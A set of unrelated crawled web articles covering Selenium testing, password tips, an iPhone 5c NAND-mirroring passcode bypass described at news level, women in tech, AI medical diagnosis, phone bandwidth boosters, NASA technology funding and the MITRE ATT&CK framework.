Creating automated tests for a web application can be challenging. Two of the biggest barriers to getting started are picking an automation tool and developing a framework for writing the tests. This course explores how to use the popular browser automation framework, Selenium, to create automated tests for web applications. We will examine using Selenium to directly record from within a Firefox browser, as well as using C# to automate the web browser using Selenium's API. We will also explore how to distribute tests over multiple machines using Selenium Server's grid capabilities. The course concludes with the implementation of a simple, maintainable framework for testing a web application using Selenium.
<urn:uuid:bfdcbc8d-563c-480c-b039-cd302c9e246f>
CC-MAIN-2024-38
https://www.mytechlogy.com/Online-IT-courses-reviews/23822/automated-web-testing-with-selenium/
2024-09-08T19:23:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00860.warc.gz
en
0.849344
129
2.84375
3
As the data of the world continues growing at an exponential rate year after year, cybercriminals have come up with highly complicated ways to get access to your personal information. They make use of simple password hacks to malware attacks and even phishing scams. It implies that if you wish to stay alert about all types of potential attacks, selecting a good, strong password is an important aspect to consider. Passwords are responsible for protecting vulnerable information critical for your life. Whether it is your social media account or bank information, behind your password lies important personal details. It could be detrimental to your entire career or life if wrong individuals would compromise the details. Creation of a secure password is crucial to protecting your personal information. When you implement a few basic steps, you can easily create a highly secure password for maximum protection. Check Out The Top 5 Tips For a Secure Password - Ensuring 2-Factor Authentication (2FA): 2FA or 2-factor Authentication is an extra layer of security used for proving that the individual trying to access the account is the one claiming they are. During the sign-up stage, the users will be asked specific questions about their lives. These questions will be utilized for security. Every time the user will log in to the respective account, they will be asked to fill in the password while answering the security question to validate that they are the rightful owner of the account. - Longer Passwords: The longer the password is, the harder it becomes to decode it. Use unique passwords for all enterprise assets at a minimum, an 8-character password for accounts using Multi-factor Authentication (MFA) and a 14-character password for accounts not using MFA. Try using random phrases, numbers, or characters. - Use Nonsense Phrases: Long passwords that include random words and phrases that are not grammatically correct will be harder to crack. Stay away from using proper nouns and other standalone dictionary words that could lead to an unsecure password. - Use Single Sign-On (SSO) and Password Manager: SSO helps reduce the number of passwords a user must manage when companies handle many enterprise & cloud applications. Password managers or similar tools are innovative ways to manage all your passwords in a centralized location. It can help keep track of all your passwords so that you are capable of updating information on a regular basis. - Avoid personal information: Strong passwords shouldn't include references to personal information such as names, birthdays, addresses, or phone numbers. For further information and guidance on the creation and use of passwords there is a CIS Password Policy Guide
<urn:uuid:08104bf5-654f-4fe1-af10-75ce33071f43>
CC-MAIN-2024-38
https://www.calcomsoftware.com/top-5-tips-for-a-secure-password/
2024-09-10T00:58:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00760.warc.gz
en
0.908701
528
3.046875
3
A security researcher has identified a process that could bypass the iOS password limit on the iPhone 5c smartphone. The iOS Password Limit Can Be Overcome Sergei Skorobogatov has described a method that can bypass one of iOS’s basic security features – the passcode limit. The demonstration was carried on an iPhone 5c device by modifying the NAND Flash memory of the device. The engineer accessed the connection to the SoC and partially reverse engineered the bus protocol. Apple encrypts the stored user data in non-volatile memory to protect the contents as well as the access credentials. This is a security precaution that is used to prevent unauthorized file recovery from lost or stolen devices. The bypass is essentially done using a NAND mirroring attack. The user’s passcode that is contained in iOS is stored together with the device’s unique ID (UID) key. The UID is hard coded into the main SoC and is part of the CPU hardware security engine. Skorobogatov has used electronic tools to eavesdrop the NAND chip communication. By analyzing the way it worked was able to bypass the passcode limit by attaching a backup NAND chip. The researcher notes that the sampled device, the iPhone 5c is far from the latest Apple devices. Since it’s introduction, there have been other models that different logic in their operations. However, the iPhone 5s and 6 use the same type of NAND flash devices so it is possible that the cloning attack can be performed against them. The newer devices use a higher speed chip with a PCIE interface which makes such bypasses much more difficult. The demonstration shows how a basic attack can be conducted, and the researcher notes that several improvements can be made. This includes automated passcode entry and rebooting by using external USB controllers that emulate the necessary functions. Apple can implement countermeasures that can prevent mirroring attacks by employing more robust authentication rather than a proprietary interface. On the software side, a challenge-response authentication can be used to prevent access to the NAND memory. Users are encouraged to use at least 6-digit passcodes. The added length of the password makes brute force attacks much more difficult for criminals. For more information, you can download the research paper titled “The bumpy road towards iPhone 5c NAND mirroring”.
<urn:uuid:4af4b020-2535-40d1-a744-96597858d1e0>
CC-MAIN-2024-38
https://bestsecuritysearch.com/researcher-creates-method-bypasses-ios-password-limit/
2024-09-11T05:59:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00660.warc.gz
en
0.940002
487
2.828125
3
As in any industry, a lack of diversity amongst employees causes a one-minded way of thinking, resulting in decreased productivity and a lack of creative and innovative solutions when it comes to problem-solving. In the technology sector, diversity is crucial in the creation of artificial intelligence (AI) and machine learning systems that replicate human decision-making. As AI only learns what people show it, a lack of diversity can really limit its effectiveness. In prioritising diversity, algorithms learn better and more accurate information that’s useful for real-world applications. But of course, there are huge opportunities for girls and women, too. Tech jobs offer higher starting salaries than many other industries and independent analysis suggests tech as a profession offers more social mobility than medicine and law. We should be doing everything we can to help women access these professional opportunities. Code First Girls recently organised a survey, which found 80% of respondents said that a career in tech was neither mentioned nor encouraged when they were at school. That’s why we provide free, virtual and accessible coding education, which means our learners can fit their studies flexibly around their lives – removing barriers for those in full-time education, work or with caring responsibilities. Code First Girls partner with more than 100 businesses including Rolls-Royce, NatWest, and GCHQ to get more women into an industry that is facing a major skills gap and desperately needs more diversity in the workforce. And it’s not just gender diversity that Code First Girls is tackling. Whilst women make up 21% of the tech industry, black women make up less than 3%. There are also economic and regional inequalities too, with 27% of our community eligible for free school meals. Although it’s hard to ignore the glass ceiling we face as women, it’s important to put aside any fear. Whilst coding, technology and STEM may be entirely new and unknown to women considering a career change, there’s no need to be afraid. There are many transferable skills that can help when it comes to coding, including innovative thinking, attention to detail, patience and communication. It’s also important to take advantage of coding communities and network with like-minded women to get the support you need. Whether it’s a technical question or an industry query, speaking to other women can help you to boost your learning and achieve your career goals, as they are likely to have experienced some of the same issues. Words: Anna Brailsford
<urn:uuid:0e3d19a8-6c7a-4909-a7d0-384f6d3bc6ad>
CC-MAIN-2024-38
https://march8.com/articles/trailblazer-anna-brailsford-ceo-of-code-first-girls
2024-09-16T07:06:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00260.warc.gz
en
0.964719
509
2.609375
3
A second opinion might not come from a doctor anymore; instead, patients might consult an artificial intelligence software. Artificial intelligence (AI) is the simulation of human intelligence by machine learning algorithms. It is a technology that has been developed to mimic the way humans think and make decisions. The concept for AI was first described as early as 1950. However, it was not until the invention of deep learning that AI had practical applications. Now, AI has advanced to the point where its problem-solving capabilities are sometimes more advanced than humans’. Healthcare tops the list of industries utilizing AI by a landslide, so it’s no surprise that recent advances in AI have been centered on improving healthcare—everything from administrative workflow to patient diagnosis and treatment. Using machine learning algorithms, AI can see patterns and “learn” to diagnose based on these patterns. AI can be programmed to flag signs of abnormalities and symptoms of diseases in medical images like MRIs, x-rays, and CT scans. These types of software are composed of a neural network that evaluates medical images alongside genetic information. This data is used in AI’s decision-making process for high accuracy and insight into a patient’s condition. It’s safe to say that AI is, by and large, successful at correctly diagnosing patients. It takes years of training for doctors to learn how to diagnose illnesses correctly. Even then, misdiagnosis is rampant; an estimated one out of 20 adult patients is misdiagnosed every year in the U.S. Similar to the intense practice doctors must undergo, it takes thousands of examples for an algorithm to learn how to recognize illness. In fact, with a standard accuracy of 72.52%, AI diagnoses illness even more accurately than the average doctor, who, in the same study, diagnosed with 71.4% accuracy. For AI to accurately diagnose patients with that level of accuracy, the examples need to be based on factual data. For that reason, AI is most useful in processes that involve digitized diagnostic information that doesn’t leave much room for guesswork or misinterpretation. AI technologies that can interpret non-digital information, such as handwritten doctor’s notes, are currently developing. However, it may be some time before such technologies learn to recognize more complex, non-digital data. In the past, AI was built to learn to diagnose following the same thought process doctors use. The original intention was for AI to mimic human behaviors as closely as possible. However, in many ways, AI’s cold, objective reliance on probabilities and factual data is advantageous. In some cases, machines are now more adept at diagnosing human illness than humans are. Some illnesses are more complex to diagnose than others, whether for lack of resources, scarcity of qualified professionals, or human limitations. Below are several examples of common illnesses that are diagnosed with the help of AI. Breast cancer is the most common cancer found in women, with about one in eight women afflicted in their lifetime. This type of cancer is detected using mammograms and ultrasounds. AI used in digital mammography has been found to improve the accuracy and efficiency of breast cancer screening. According to a 2019 study published by the University of Oxford Press, the AI in digital mammography machines uses “deep learning convolutional neural networks, feature classifiers, and image analysis algorithms to detect calcifications and soft tissue lesions.” Based on these findings, the software assigns a score between one and ten. One represents the lowest level of suspicion that cancer is present, while 10 represents the greatest. To give the score, AI compares the patient’s data to thousands of ultrasounds images, both healthy and abnormal. Lung cancer is the deadliest cancer globally, accounting for about 25% of all cancer-related deaths. AI technologies have been developed to recognize early signs of lung cancer not visible to doctors. New AI technology uses deep learning to find lung cancer early. Early diagnosis can make all the difference for cancer that kills 75% of patients within five years of diagnosis. Rather than relying on what parameters a human programmer classifies as malignant, the machine analyzes thousands of CT scans and learns for itself what lung cancer looks like. Before AI’s assistance, lung cancer was often not detected in time for effective treatment. This could be due to several things such as ignored symptoms or doctors’ limitations in detecting tumors with the naked eye–It’s easy for tiny, malignant tumors to be missed. Tuberculosis remains the most deadly infectious disease. Now, it can be diagnosed with high accuracy using a smartphone camera. Like the above examples, the AI used in this technology also applies a deep-learning model. It was developed using a database of 250,044 chest x-rays. These x-rays, which did not show tuberculosis, were used to train the neural network to recognize abnormalities. The model was then recalibrated using an augmented data set and an additional two-layer neural network. The software can detect tuberculosis in smartphone photos of x-rays. This kind of AI is a critical tool in high populations of people with tuberculosis or limited resources. Traditional diagnosis by radiologists, on the other hand, has proven more expensive and less accurate. This particular AI features rapid reading and reporting–it determines whether an x-ray shows tuberculosis in under two minutes. This is critical for an infection like tuberculosis, as early detection leads to higher survival rates. Earlier this week, Google announced the development of an AI-powered dermatology tool that can detect skin problems. Google says that every year they see nearly ten billion Google Searches related to skin, nail, and hair issues. Google’s new application is web-based and requires the use of a smartphone camera. Using their camera, a user must take photographs of the problematic area from three different angles. The user is then asked to answer questions about their skin type and how long they’ve had symptoms. The application then draws from its knowledge of 288 conditions to provide users with a list of possible conditions they may be experiencing. Google stresses that the tool is not to be used in place of a formal diagnosis. However, it may be conducive for those who have limited resources and cannot see a dermatologist. The tool shows information and an FAQ for the identified condition to give users information needed to make a treatment decision. As the AI continues to be developed, it may prove to be an invaluable tool for people unsure whether they need to see a doctor for their skin condition. Diabetic Retinopathy is a condition that affects the eyes due to diabetes. There are a few technologies in development that use AI to screen patients for Diabetic Retinopathy. One system, IDx-DR, has already been cleared by the FDA for the detection of diabetic Retinopathy. Two images are captured per eye. The images are then scanned for signs of diabetic Retinopathy within minutes. Like the EyeArt AI Screening System, other systems use similar mechanisms but do not require substantial training to use. It also supports a dual diagnosis from both the AI and a human doctor, which opens up possibilities for a wholly novel diagnosis method. AI can be used to flag abnormalities in medical imaging, predict outcomes of a stroke, and help patients manage chronic diseases. Increasingly, AI is being used to diagnose illnesses, such as cardiac arrhythmia, lung cancer, skin lesions, and Diabetic Retinopathy. AI continues to have vast implications for the healthcare industry overall. This technology has become an essential tool in a field that is in constant demand of trained professionals. Over-demand and under-supply leave many physicians over-exerted and delay treatment. The medical profession has one of the most significant percentages of burnout; nearly 42% of practicing physicians report feeling burnout. Many doctors experience exceedingly high levels of stress before they even begin practicing. With this in mind, we can see how AI can improve the experience of both patients and physicians and improve diagnostics, treatment outcomes, and, when early detection is critical, be the difference between life and death.
<urn:uuid:e0df6200-60b4-4773-a807-6134e1066095>
CC-MAIN-2024-38
https://plat.ai/blog/how-ai-assists-in-medical-diagnosis/
2024-09-16T06:53:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00260.warc.gz
en
0.955976
1,669
3.90625
4
Whether you need to entertain your kid on a long car ride or want to stream the latest sports game from any location, your phone's data network has your back. LTE, 4G, 5G, and other phone data service variations provide you with on-the-go internet access. However, meeting the dreadful spinning download icon just as your favorite team's about to score a goal or before battling enemies on a video game can cause plenty of frustration. Understanding your network's bandwidth could save you from those irritating moments and keep you in the loop of experiencing monumental moments through your phone. Here’s what cell phone users should know about bandwidth. Bandwidth vs. Internet Speed People commonly mistake bandwidth and internet speed for one another, but the two are distinct. Bandwidth refers to the amount of data uploaded and downloaded between your cell and the internet. Meanwhile, the rate at which the data travels relates to your internet speed. Your bandwidth can affect the internet speed, but differing internet speeds don't change your bandwidth. Bandwidths are like tunnels. The wider the tunnel, the more cars pass through. However, the smaller the tunnel, the greater the congestion. The cars in this scenario represent the data traveling to and from a device connected to the internet. Regardless of the speed of the cars (internet speed), if the tunnels (bandwidth) aren't big enough to handle numerous cars simultaneously, increases in traffic (download and upload interruptions) occur. What Affects Bandwidth? Numerous devices simultaneously connecting to the same network means more data trying to pass through the system. Small bandwidths struggle to accommodate great demands for information, causing less data to travel to and from your phones, ultimately hindering everyone's connection experience and increasing buffering times. Likewise, running multiple apps at once increases the amount of information required to upload and download through the system, creating lag, wait times, and connection issues. How To Fix Bandwidth Issues You can enhance your data usage, strength, and quality in various ways, from limiting the number of devices on a network to clearing your internet search cache and upgrading network plans. Cellular boosters can enhance your connection since they boost signals that carry the data and information uploaded and downloaded between your network and phone. They capture, amplify, and retransmit nearby signals, increasing cellular connection strength and quality. Moreover, their antennas provide clear, concise, and optimal pathways for information to travel across, upping signal strength and helping relieve some of the burdens on your bandwidth. SureCall Boosters in Canada provides various cell phone reception boosters to amplify your cellular connectivity and support your network bandwidth in your home, commercial building, or vehicle. The more knowledge you have on what cell phone users should know about bandwidth, the better your chances of avoiding interrupted streams, slow buffering times, and other data usage issues. Plus, you can select a bandwidth that suits you or your household's needs. Watch your favorite teams dominate their opponents live, play lag-free games, and perform work tasks unhindered with the right bandwidth pairing and knowledge.
<urn:uuid:968482e4-99ca-492e-abd4-cb7d7e4f004d>
CC-MAIN-2024-38
https://www.surecallboosters.ca/post/what-cell-phone-users-should-know-about-bandwidth
2024-09-18T17:56:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00060.warc.gz
en
0.931391
623
2.9375
3
NASA has launched its third round of funding for what it calls “tipping point” technologies. It wants to encourage companies to invest in the agency’s mission and develop technologies that can help with space exploration. The catch? The company must be able to develop programs that are mature enough to have commercial application. Tipping point technologies are defined by NASA as programs where reasonable investment is needed to advance current missions, but also ease the transition into the commercial space market. These technologies are ranked by readiness, according to Stephen Jurczyk, NASA associate administrator for the Space Technology Mission Directorate. “We want to encourage new and innovative technologies and new innovative approaches … developing the technologies that we need for our future capabilities,” Jurczyk said onFederal Drive with Tom Temin. But the technologies have to at least be at level four to be considered successful investments. In other words, the technology must at least be demonstrated in a laboratory environment, and has been demonstrated to work. “We’re trying to get [them] to a six,” he said. “Which is tested in a simulated space environment on the ground and get it to the point where its getting ready to fly.” Technologies ranked at a six or higher are tested in the parabolic aircraft with at least 30 seconds in an microgravity environment. Another way NASA can test these new applications is through its partnership with Blue Origin and the New Shepard vehicle. On this aircraft, the technology will be exposed to about 3 minutes of continuous microgravity, Jurczyk said. This simulated flight experience gives the agency time to “shake out” the technology before deploying it to the International Space Station or aboard another aircraft. Proposed technologies may have had prior NASA investment, research and development investment from other government agencies or received funding through NGO and venture capital investment. For this third round of funding, Jurcyzk said the directorate is focusing on technologies that will help with three main missions: Expanding utilization of space Enabling efficient, safe transportation into and through space Increasing access to the surfaces of other planets “We want to provide more flexibility for industry to propose,” he said. “And then in order to deal with the larger number of proposals that we might get because we’re not narrowing it down to specific technology areas, we defined a two-step proposal process.” First step proposals — short, introductory white papers — are due at the end of January. Jurczyk said the directorate will whittle down the list of proposals and release in March 2018 a list of accepted proposals. Full proposals from this list will be due in May 2018. Evaluations will take place soon after and he said they hope to put contracts in place by the end of the summer. “Mostly, we are looking to enable commercial space activities and we’re looking for not only how the technology would enable a capability that would advance the company’s interests, but also kind of their business strategy,” Jurczyk said. For more Information, click here to visit the directorate website.
<urn:uuid:58daf45d-6c53-48b6-865b-1c500f321fbb>
CC-MAIN-2024-38
https://federalnewsnetwork.com/technology-main/2017/12/nasa-reaches-out-to-commercial-technology-sector-to-improve-space-exploration/?readmore=1
2024-09-19T20:21:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00860.warc.gz
en
0.955911
652
2.65625
3
The MITRE ATT&CK Framework is a knowledge base of tactics and techniques that can be used as a foundation for classifying adversary behaviors and assessing an organization’s vulnerabilities. Created in 2013 by the MITRE Corporation, a non-profit supporting U.S. government agencies, it is one of the most comprehensive sources for classifying threats and developing models. The ATT&CK portion of the name stands for Adversarial Tactics, Techniques, and Common Knowledge. Simply put, you can imagine the MITRE ATT&CK knowledge base a “Wikipedia” of cyber threats and tactics. MITRE is a government-funded research organization. The company was born out of MIT in 1958. MITRE started ATT&CK in 2013 to document common tactics, techniques, and procedures (TTPs) that advanced persistent threats use against Windows enterprise networks. It was created out of a need to document adversary behaviors for use within a MITRE research project. The MITRE ATT&CK Matrices are tactics and techniques laid out in a “periodic table” of tactics and techniques used by threat hunters, defenders, and other cybersecurity professionals to classify attacks and assess an organization’s risk. The most popular framework used is the MITRE ATT&CK® Matrix for Enterprise. The matrix contains information for the following platforms: Windows, macOS, Linux, PRE, AWS, GCP, Azure, Azure AD, Office 365, SaaS, Network. The MITRE ATT&CK Tactics represent the “why” of a technique. What is the adversary’s objective when performing an action? Tactics give important context to the offensive action. Techniques are the “how” component of the action, how an adversary achieves the tactic. They may also represent the “what” an adversary gains by performing an action. There are a number of ways an organization can utilize the MITRE ATT&CK framework, here are just a few: When choosing a Managed Security Service Provider (MSSP) for outsourced threat detection and response services, the MITRE ATT&CK Framework proves its value in a Security Operations Center (SOC). Lumifi uses the MITRE ATT&CK framework in several ways. First, our content team maps each of our alerts to a technique, which allows us to see where our detections are heaviest and where we need to expand our ruleset. When our analysts are threat hunting, they use MITRE techniques as guides for Tools, Techniques, and Procedures (TTPs) that they should be on the lookout for. Doing so allows us to find gaps in customer visibility. One use case is if a customer gets all their alerts in the Reconnaissance phase, but not much else, we can assume they are not receiving all relevant data. This would start a process where we take another look at their environment and see if their critical logging source has changed their logging format. Another added benefit is trend data. Lumifi receives alerts across our clients’ environments collectively, where they can be categorized using the MITRE framework. For example, if there is a spike in Initial Access through phishing, like the initial onset of COVID-19, or an influx in Supply Chain attacks in the SolarWinds fiasco. Our customers receive more information so they can become more granular with their defense strategies and focus on weak areas. For example, if we see a customer with a large amount of phishing emails, they may need to step up their email filtering. Or if we see an increase in privilege escalation, defense evasion, or credential access, we should figure out the origin of these attacks and ensure the customer has a solid Endpoint Detection and Response platform. MITRE allows Lumifi to identify gaps in security and give a broad picture of where our SOC should focus and how to better assist our clients. Every level of our security operations team uses the MITRE ATT&CK framework, from reporting to tasking the threat content team to see if customers need specialized assistance or guidance. Lumifi's proprietary orchestration tool, SHIELDVision, utilizes the MITRE ATT&CK framework in order to provide concise identification and feedback. We utilize the framework in our automated scans, hunting scans, and investigations. Analysts make sure to list the Access and Technique according to the framework. Customers can rest easier knowing we are mapping their networks to the MITRE framework and receive additional insight in their quarterly calls with our engagement team. The MITRE ATT&CK Framework is an important tool for red and blue teams alike. Whether it’s emulating an attack or using the framework to inform security decisions, the MITRE ATT&CK framework is a useful piece of the cybersecurity landscape. Leading MSSPs utilize the framework in order to provide in-depth investigations, threat hunt, and create clear communication with their customers. To learn more about how Lumifi uses the MITRE ATT&CK Framework and how we can protect your network, contact us today.
<urn:uuid:bfa23efb-625d-4271-9dca-d88f38d4861d>
CC-MAIN-2024-38
https://www.lumificyber.com/blog/what-is-the-mitre-attck-framework/
2024-09-19T21:07:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00860.warc.gz
en
0.917462
1,051
2.75
3